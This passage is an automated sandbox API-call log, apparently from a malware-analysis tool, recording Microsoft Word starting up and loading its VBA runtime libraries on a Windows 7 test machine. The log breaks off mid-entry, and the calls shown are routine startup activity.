# Flog Txt Version 1 # Analyzer Version: 3.0.1 # Analyzer Build Date: Apr 9 2019 11:17:16 # Log Creation Date: 14.04.2019 14:36:07.778 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x3f89e000" os_pid = "0x8e8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "64" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa18 Thread: id = 2 os_tid = 0xa14 Thread: id = 3 os_tid = 0x9d4 Thread: id = 4 os_tid = 0x9d0 Thread: id = 5 os_tid = 0x9cc Thread: id = 6 os_tid = 0x9c8 Thread: id = 7 os_tid = 0x9c4 Thread: id = 8 os_tid = 0x9c0 Thread: id = 9 os_tid = 0x9bc Thread: id = 10 os_tid = 0x9b8 Thread: id = 11 os_tid = 0x9b4 Thread: id = 12 os_tid = 0x9b0 Thread: id = 13 os_tid = 0x9ac Thread: id = 14 os_tid = 0x98c Thread: id = 15 os_tid = 0x988 Thread: id = 16 os_tid = 0x8fc Thread: id = 17 os_tid = 0x8f4 Thread: id = 18 os_tid = 0x8f0 Thread: id = 19 os_tid = 0x8ec [0060.004] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x140a60 | out: lpSystemTimeAsFileTime=0x140a60*(dwLowDateTime=0x85383380, dwHighDateTime=0x1d4f2cf)) [0060.004] GetCurrentProcessId () returned 0x8e8 [0060.004] GetCurrentThreadId () returned 0x8ec [0060.004] GetTickCount () returned 0x1fbcb [0060.004] QueryPerformanceCounter (in: lpPerformanceCount=0x140a68 | out: lpPerformanceCount=0x140a68*=18447153159) returned 1 [0060.007] __dllonexit () returned 0x2210800003ff2402 [0060.008] __dllonexit () returned 0x3422800003ff2402 [0060.014] __dllonexit () returned 0x35b4800003ff2402 [0060.015] __dllonexit () returned 0x3a5a800003ff2402 [0060.015] __dllonexit () returned 0x3598800003ff2402 [0060.016] __dllonexit () returned 0x35e8800003ff2402 [0060.016] __dllonexit () returned 0x35f8800003ff2402 [0060.016] __dllonexit () returned 0x35c8800003ff2402 [0060.017] __dllonexit () returned 0x35d8800003ff2402 [0060.017] __dllonexit () returned 0x3528800003ff2402 [0060.018] __dllonexit () returned 0x3538800003ff2402 [0060.018] __dllonexit () returned 0x3508800003ff2402 [0060.018] __dllonexit () returned 0x3518800003ff2402 [0060.019] __dllonexit () returned 0x3568800003ff2402 [0060.019] __dllonexit () returned 0x3578800003ff2402 [0060.019] __dllonexit () returned 0x3548800003ff2402 [0060.020] __dllonexit () returned 0x3558800003ff2402 [0060.020] __dllonexit () returned 0x3340800003ff2402 [0060.021] __dllonexit () returned 0x2278800003ff2402 [0060.021] __dllonexit () returned 0x2240800003ff2402 [0060.022] __dllonexit () returned 0x2250800003ff2402 [0060.022] __dllonexit () returned 0x3db8800003ff2402 [0060.022] __dllonexit () returned 0x3d80800003ff2402 [0060.023] __dllonexit () returned 0x3d9e800003ff2402 [0060.025] DisableThreadLibraryCalls (hLibModule=0x7fee3780000) returned 1 [0060.025] GetVersion () returned 0x1db10106 [0060.025] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0060.025] GetUserDefaultLCID () returned 0x409 [0060.025] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0060.025] GetSystemMetrics (nIndex=5) returned 1 [0060.025] GetSystemMetrics (nIndex=6) returned 1 [0060.025] GetSystemMetrics (nIndex=11) returned 32 [0060.025] GetSystemMetrics (nIndex=12) returned 32 [0060.025] GetSystemMetrics (nIndex=34) returned 132 [0060.025] GetSystemMetrics (nIndex=35) returned 38 [0060.025] GetSystemMetrics (nIndex=0) returned 1440 [0060.025] GetSystemMetrics (nIndex=1) returned 900 [0060.025] GetSystemMetrics (nIndex=32) returned 4 [0060.025] GetSystemMetrics (nIndex=33) returned 4 [0060.025] GetSystemMetrics (nIndex=4) returned 22 [0060.025] GetSystemMetrics (nIndex=42) returned 0 [0060.025] GetStockObject (i=15) returned 0x188000b [0060.025] GetStockObject (i=7) returned 0x1b00017 [0060.025] GetStockObject (i=6) returned 0x1b00018 [0060.025] GetStockObject (i=8) returned 0x1b00016 [0060.025] GetStockObject (i=4) returned 0x1900011 [0060.025] GetStockObject (i=2) returned 0x1900012 [0060.025] GetStockObject (i=0) returned 0x1900010 [0060.025] GetStockObject (i=5) returned 0x1900015 [0060.025] GetStockObject (i=13) returned 0x18a002e [0060.025] GetDC (hWnd=0x0) returned 0x370108cc [0060.025] GetDeviceCaps (hdc=0x370108cc, index=14) returned 1 [0060.025] GetDeviceCaps (hdc=0x370108cc, index=12) returned 32 [0060.025] GetDeviceCaps (hdc=0x370108cc, index=88) returned 96 [0060.025] GetDeviceCaps (hdc=0x370108cc, index=90) returned 96 [0060.025] GetDeviceCaps (hdc=0x370108cc, index=38) returned 32409 [0060.026] ReleaseDC (hWnd=0x0, hDC=0x370108cc) returned 1 [0060.026] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x7fee3b5ba60 | out: ppMalloc=0x7fee3b5ba60*=0x7fefec05380) returned 0x0 [0066.401] malloc (_Size=0x140) returned 0x25123f0 [0066.495] GetModuleHandleA (lpModuleName=0x0) returned 0x13f2a0000 [0066.501] QueryActCtxW (in: dwFlags=0x80000010, hActCtx=0x7fee3b5a048, pvSubInstance=0x0, ulInfoClass=0x1, pvBuffer=0x1471a0, cbBuffer=0x10, pcbWrittenOrRequired=0x0 | out: pvBuffer=0x1471a0, pcbWrittenOrRequired=0x0) returned 1 [0066.501] ActivateActCtx (in: hActCtx=0x406f008, lpCookie=0x147190 | out: hActCtx=0x406f008, lpCookie=0x147190) returned 1 [0066.501] FindActCtxSectionStringW (in: dwFlags=0x0, lpExtensionGuid=0x0, ulSectionId=0x2, lpStringToFind="Comctl32.dll", ReturnedData=0x1471b0 | out: ReturnedData=0x1471b0) returned 1 [0066.501] LoadLibraryW (lpLibFileName="Comctl32.dll") returned 0x7fefbbe0000 [0066.502] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca00000171) returned 1 [0066.502] RegisterClassA (lpWndClass=0x1474e0) returned 0x306a81f0959c197 [0066.503] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca00000172) returned 1 [0066.505] wcscpy_s (in: _Destination=0x408a250, _SizeInWords=0x7, _Source="Common" | out: _Destination="Common") returned 0x0 [0066.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word Documents (*.docm;*.dotm;*.doc;*.dot)", cchWideChar=70, lpMultiByteStr=0x2512540, cbMultiByte=140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word Documents (*.docm;*.dotm;*.doc;*.dot)", lpUsedDefaultChar=0x0) returned 70 [0066.507] GetModuleHandleExA (in: dwFlags=0x0, lpModuleName="MSI.DLL", phModule=0x7fee3b61418 | out: phModule=0x7fee3b61418*=0x7fef9580000) returned 1 [0066.508] GetProcAddress (hModule=0x7fef9580000, lpProcName="MsiProvideQualifiedComponentA") returned 0x7fef9603b3c [0066.508] GetProcAddress (hModule=0x7fef9580000, lpProcName="MsiGetProductCodeA") returned 0x7fef95fa13c [0066.509] GetProcAddress (hModule=0x7fef9580000, lpProcName="MsiReinstallFeatureA") returned 0x7fef9601618 [0066.509] GetProcAddress (hModule=0x7fef9580000, lpProcName="MsiProvideComponentA") returned 0x7fef95ff088 [0066.522] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0066.522] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0066.522] lstrcpyW (in: lpString1=0x147260, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" [0066.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", cchWideChar=-1, lpMultiByteStr=0x147150, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", lpUsedDefaultChar=0x0) returned 68 [0066.522] GetModuleHandleA (lpModuleName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x0 [0067.383] LoadLibraryExA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", hFile=0x0, dwFlags=0x8) returned 0x7fee2ce0000 [0067.446] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca00000173) returned 1 [0067.446] GetLastError () returned 0x0 [0067.446] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoVBADigSigCallDlg") returned 0x7fee2de72c0 [0067.446] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoVbaInitSecurity") returned 0x7fee2d560b0 [0067.446] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFIEPolicyAndVersion") returned 0x7fee2d01a60 [0067.447] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFAnsiCodePageSupportsLCID") returned 0x7fee2d55f50 [0067.447] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFInitOffice") returned 0x7fee2cff000 [0067.447] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoUninitOffice") returned 0x7fee2cee860 [0067.448] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFGetFontSettings") returned 0x7fee2ce3fc0 [0067.448] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoRgchToRgwch") returned 0x7fee2cf2380 [0067.448] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoHrSimpleQueryInterface") returned 0x7fee2ce7b80 [0067.448] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoHrSimpleQueryInterface2") returned 0x7fee2ce7b20 [0067.449] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFCreateControl") returned 0x7fee2ce8730 [0067.449] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFLongLoad") returned 0x7fee2e23260 [0067.449] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFLongSave") returned 0x7fee2e23280 [0067.450] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFGetTooltips") returned 0x7fee2cf1f40 [0067.450] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFSetTooltips") returned 0x7fee2d56370 [0067.450] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFLoadToolbarSet") returned 0x7fee2d44590 [0067.451] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFCreateToolbarSet") returned 0x7fee2ce55b0 [0067.451] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoHpalOffice") returned 0x7fee2cf0240 [0067.451] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFWndProcNeeded") returned 0x7fee2ce3d10 [0067.452] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFWndProc") returned 0x7fee2ce6d30 [0067.452] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFCreateITFCHwnd") returned 0x7fee2ce3d40 [0067.452] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoDestroyITFC") returned 0x7fee2cee6f0 [0067.453] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFPitbsFromHwndAndMsg") returned 0x7fee2cedf40 [0067.453] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFGetComponentManager") returned 0x7fee2ce7bf0 [0067.453] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoMultiByteToWideChar") returned 0x7fee2cefcd0 [0067.454] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoWideCharToMultiByte") returned 0x7fee2ce8b20 [0067.454] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoHrRegisterAll") returned 0x7fee2de2ef0 [0067.454] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFSetComponentManager") returned 0x7fee2cf42c0 [0067.455] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFCreateStdComponentManager") returned 0x7fee2ce3e20 [0067.455] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFHandledMessageNeeded") returned 0x7fee2ceab10 [0067.455] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoPeekMessage") returned 0x7fee2cea7d0 [0067.455] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFCreateIPref") returned 0x7fee2ce1550 [0067.456] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoDestroyIPref") returned 0x7fee2cee830 [0067.456] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoChsFromLid") returned 0x7fee2ce13d0 [0067.456] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoCpgFromChs") returned 0x7fee2ce6660 [0067.457] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoSetLocale") returned 0x7fee2ce1500 [0067.458] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoFSetHMsoinstOfSdm") returned 0x7fee2ce3dd0 [0067.458] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoSetVbaInterfaces") returned 0x7fee2de71e0 [0067.458] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="MsoGetControlInstanceId") returned 0x7fee2db6d10 [0067.458] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="VbeuiFIsEdpEnabled") returned 0x7fee2e298e0 [0067.459] GetProcAddress (hModule=0x7fee2ce0000, lpProcName="VbeuiEnterpriseProtect") returned 0x7fee2e29830 [0067.460] malloc (_Size=0x48) returned 0x25125e0 [0067.461] GetEnvironmentVariableA (in: lpName="DDRYBUR", lpBuffer=0x147240, nSize=0x118 | out: lpBuffer="(\x01") returned 0x0 [0067.461] SetErrorMode (uMode=0x8001) returned 0x8001 [0067.461] GetModuleFileNameA (in: hModule=0x7fee3780000, lpFilename=0x146f50, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0067.461] lstrcpyA (in: lpString1=0x146e40, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0067.461] lstrcpyA (in: lpString1=0x146e40, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0067.461] lstrcpyA (in: lpString1=0x146e40, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0067.461] lstrcpyA (in: lpString1=0x146e40, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0067.461] lstrcpyA (in: lpString1=0x146e40, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0067.461] lstrcpyA (in: lpString1=0x146e40, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0067.461] strcpy_s (in: _Dst=0x147060, _DstSize=0x200, _Src="VBE7INTL.DLL" | out: _Dst="VBE7INTL.DLL") returned 0x0 [0067.461] _ultoa_s (in: _Val=0x409, _DstBuf=0x146bc0, _Size=0x6, _Radix=10 | out: _DstBuf="1033") returned 0x0 [0067.461] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\", _SizeInBytes=0x104, _Source="1033" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033") returned 0x0 [0067.461] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033", _SizeInBytes=0x104, _Source="\\" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\") returned 0x0 [0067.462] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\", _SizeInBytes=0x104, _Source="VBE7INTL.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0067.462] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 75 [0067.462] CharToOemBuffA (in: lpszSrc="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", lpszDst=0x146a70, cchDstLength=0x4c | out: lpszDst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 1 [0067.462] _access_s (_FileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", _AccessMode=0) returned 0x0 [0067.463] strcpy_s (in: _Dst=0x146cf0, _DstSize=0x104, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0067.463] LoadLibraryA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x7fee2cb0000 [0067.473] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca00000174) returned 1 [0067.473] GetSystemDefaultLCID () returned 0x409 [0067.473] GetUserDefaultLCID () returned 0x409 [0067.473] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x147380, cchData=2 | out: lpLCData=".") returned 2 [0067.473] GetStockObject (i=13) returned 0x18a002e [0067.473] GetObjectA (in: h=0x18a002e, c=60, pv=0x147320 | out: pv=0x147320) returned 60 [0067.473] lstrcpyA (in: lpString1=0x7fee3b61b70, lpString2="Vbui6.chm" | out: lpString1="Vbui6.chm") returned="Vbui6.chm" [0067.473] lstrcpyA (in: lpString1=0x7fee3b60b40, lpString2="VbLR6.chm" | out: lpString1="VbLR6.chm") returned="VbLR6.chm" [0067.474] GetModuleFileNameA (in: hModule=0x7fee3780000, lpFilename=0x1473c0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0067.475] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 66 [0067.475] lstrcpyA (in: lpString1=0x2fccd50, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" [0067.475] GetCurrentDirectoryA (in: nBufferLength=0x104, lpBuffer=0x147250 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b [0067.475] GetVersionExA (in: lpVersionInformation=0x1472b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x43, szCSDVersion="") | out: lpVersionInformation=0x1472b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0067.475] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="Licenses", phkResult=0x1471d8 | out: phkResult=0x1471d8*=0xa0e) returned 0x0 [0067.476] strcpy_s (in: _Dst=0x1471e0, _DstSize=0x80, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0067.476] strcpy_s (in: _Dst=0x147260, _DstSize=0xc8, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0067.476] _strrev (in: _Str="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Str="7E25578F0000-E3CB-1d11-377B-B8554088") returned="7E25578F0000-E3CB-1d11-377B-B8554088" [0067.476] RegQueryValueA (in: hKey=0xa0e, lpSubKey="8804558B-B773-11d1-BC3E-0000F87552E7", lpData=0x147260, lpcbData=0x1471d0 | out: lpData="\x0f}\x02\x01", lpcbData=0x1471d0) returned 0x2 [0067.476] RegCloseKey (hKey=0xa0e) returned 0x0 [0067.476] OleInitialize (pvReserved=0x0) returned 0x1 [0067.476] OaBuildVersion () returned 0x321396 [0067.476] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x7fefd480000 [0067.477] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca00000175) returned 1 [0067.477] GetLastError () returned 0x0 [0067.477] GetProcAddress (hModule=0x7fefd480000, lpProcName="SysFreeString") returned 0x7fefd481320 [0067.478] GetProcAddress (hModule=0x7fefd480000, lpProcName="LoadTypeLib") returned 0x7fefd48f1e0 [0067.478] GetProcAddress (hModule=0x7fefd480000, lpProcName="RegisterTypeLib") returned 0x7fefd4dcaa0 [0067.478] GetProcAddress (hModule=0x7fefd480000, lpProcName="QueryPathOfRegTypeLib") returned 0x7fefd511760 [0067.479] GetProcAddress (hModule=0x7fefd480000, lpProcName="UnRegisterTypeLib") returned 0x7fefd5120d0 [0067.479] GetProcAddress (hModule=0x7fefd480000, lpProcName="OleTranslateColor") returned 0x7fefd4ac760 [0067.480] GetProcAddress (hModule=0x7fefd480000, lpProcName="OleCreateFontIndirect") returned 0x7fefd4decd0 [0067.480] GetProcAddress (hModule=0x7fefd480000, lpProcName="OleCreatePictureIndirect") returned 0x7fefd4de840 [0067.480] GetProcAddress (hModule=0x7fefd480000, lpProcName="OleLoadPicture") returned 0x7fefd4ef420 [0067.481] GetProcAddress (hModule=0x7fefd480000, lpProcName="OleCreatePropertyFrameIndirect") returned 0x7fefd4e4ec0 [0067.481] GetProcAddress (hModule=0x7fefd480000, lpProcName="OleCreatePropertyFrame") returned 0x7fefd4e9350 [0067.481] GetProcAddress (hModule=0x7fefd480000, lpProcName="OleIconToCursor") returned 0x7fefd4b6e40 [0067.482] GetProcAddress (hModule=0x7fefd480000, lpProcName="LoadTypeLibEx") returned 0x7fefd48a550 [0067.482] GetProcAddress (hModule=0x7fefd480000, lpProcName="OleLoadPictureEx") returned 0x7fefd4ef320 [0067.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0067.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0067.482] GetClassInfoA (in: hInstance=0x7fee3780000, lpClassName="VBBubble", lpWndClass=0x147310 | out: lpWndClass=0x147310) returned 0 [0067.482] RegisterClassA (lpWndClass=0x147310) returned 0xe3599b430838c199 [0067.482] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca00000176) returned 1 [0067.482] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Count") returned 0x107630 [0067.483] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_Default") returned 0x10c26a [0067.483] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Item") returned 0x107ad7 [0067.483] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Add") returned 0x1072f7 [0067.483] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Remove") returned 0x10b1cf [0067.483] GlobalAddAtomA (lpString="VBDisabled") returned 0xe3599b440838c138 [0067.483] malloc (_Size=0x90) returned 0x2fcce50 [0067.483] RegisterClassExA (param_1=0x147430) returned 0xe3599b4708b0c19a [0067.483] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca00000177) returned 1 [0067.484] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderMain", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7fee3780000, lpParam=0x0) returned 0x101f4 [0067.485] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca00000178) returned 1 [0067.485] GetVersionExA (in: lpVersionInformation=0x147220*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x147220*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0067.485] GetModuleHandleA (lpModuleName="USER32") returned 0x76f40000 [0067.486] GetProcAddress (hModule=0x76f40000, lpProcName="GetSystemMetrics") returned 0x76f594f0 [0067.486] GetProcAddress (hModule=0x76f40000, lpProcName="MonitorFromWindow") returned 0x76f55f08 [0067.486] GetProcAddress (hModule=0x76f40000, lpProcName="MonitorFromRect") returned 0x76f52b00 [0067.487] GetProcAddress (hModule=0x76f40000, lpProcName="MonitorFromPoint") returned 0x76f4ab64 [0067.487] GetProcAddress (hModule=0x76f40000, lpProcName="EnumDisplayMonitors") returned 0x76f55c30 [0067.487] GetProcAddress (hModule=0x76f40000, lpProcName="GetMonitorInfoA") returned 0x76f4a730 [0067.488] GetProcAddress (hModule=0x76f40000, lpProcName="EnumDisplayDevicesA") returned 0x76f4a5b4 [0067.488] MonitorFromWindow (hwnd=0x101f4, dwFlags=0x2) returned 0x10001 [0067.488] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x147430 | out: lpmi=0x147430) returned 1 [0067.488] SetWindowPos (hWnd=0x101f4, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0067.488] GetVersion () returned 0x1db10106 [0067.489] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x7fefd480000 [0067.489] GetProcAddress (hModule=0x7fefd480000, lpProcName="DispCallFunc") returned 0x7fefd482270 [0067.490] GetProcAddress (hModule=0x7fefd480000, lpProcName="LoadTypeLibEx") returned 0x7fefd48a550 [0067.490] GetProcAddress (hModule=0x7fefd480000, lpProcName="UnRegisterTypeLib") returned 0x7fefd5120d0 [0067.490] GetProcAddress (hModule=0x7fefd480000, lpProcName="CreateTypeLib2") returned 0x7fefd50dbd0 [0067.491] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarDateFromUdate") returned 0x7fefd485c90 [0067.491] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarUdateFromDate") returned 0x7fefd486330 [0067.491] GetProcAddress (hModule=0x7fefd480000, lpProcName="GetAltMonthNames") returned 0x7fefd4a66c0 [0067.492] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarNumFromParseNum") returned 0x7fefd484710 [0067.492] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarParseNumFromStr") returned 0x7fefd4848f0 [0067.493] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarDecFromR4") returned 0x7fefd4bb640 [0067.493] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarDecFromR8") returned 0x7fefd4bb360 [0067.493] GetProcAddress (hModule=0x7fefd480000, lpProcName="VarDecFromDate") returned 